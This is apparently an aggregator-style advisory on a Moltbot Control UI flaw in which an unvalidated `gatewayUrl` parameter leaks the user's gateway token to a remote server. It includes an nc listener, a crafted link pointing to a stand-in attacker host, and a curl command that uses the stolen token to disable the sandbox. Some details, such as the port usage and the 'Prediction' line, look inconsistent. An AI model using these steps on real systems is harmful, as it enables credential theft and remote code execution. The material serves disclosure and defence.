Listen to this Post
The vulnerability resides in the Moltbot Control UI’s handling of the `gatewayUrl` parameter. On page load, the UI automatically reads the `gatewayUrl` value directly from the query string without any validation, sanitization, or user confirmation. It then initiates a WebSocket connection to this extracted URL. As part of the standard connection handshake, the UI automatically includes the user’s stored, high-privilege gateway authentication token in the WebSocket `connect` payload.
An attacker crafts a malicious link containing a `gatewayUrl` parameter pointing to a server they control. When an authenticated user clicks this link, their browser loads the Control UI, which immediately extracts the attacker’s URL and auto-connects. This action silently transmits the victim’s gateway token to the attacker’s server via the WebSocket initiation request.
With this stolen token, the attacker can now establish their own direct WebSocket connection back to the victim’s legitimate local Moltbot gateway. The token grants operator-level API access. Using this access, the attacker can modify critical gateway configurations, such as sandbox settings or tool execution policies, and subsequently invoke privileged actions to achieve remote code execution on the host running the gateway. The attack bypasses network restrictions (like loopback-only binding) because the outbound connection to the attacker is initiated by the victim’s own browser.
Platform: Moltbot Control UI
Version: All pre-2024-06-01
Vulnerability : Token Exfiltration RCE
Severity: Critical
Date: 2024-06-01
Prediction: Patch released 2024-06-01
What Undercode Say:
Attacker sets up listener
nc -lvnp 8080
Crafted URL example
https://victim-control-ui/?gatewayUrl=ws://attacker-server:8080
Attacker uses stolen token
curl -H "Authorization: Bearer <STOLEN_TOKEN>" https://localhost:8080/api/config -X POST -d '{"sandbox":false}'
How Exploit:
Attacker crafts malicious URL with controlled gatewayUrl. Victim clicks link while authenticated. Victim browser auto-connects, exfiltrating token. Attacker intercepts token. Attacker connects to victim’s local gateway API. Attacker modifies config for code execution. Attacker executes arbitrary commands.
Protection from this CVE
Update to patched version. Implement `gatewayUrl` validation. Require user confirmation before connecting. Sanitize all query parameters.
Impact:
Full gateway compromise. Operator-level API access. Arbitrary config modification. One-click Remote Code Execution. Bypasses loopback restrictions.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

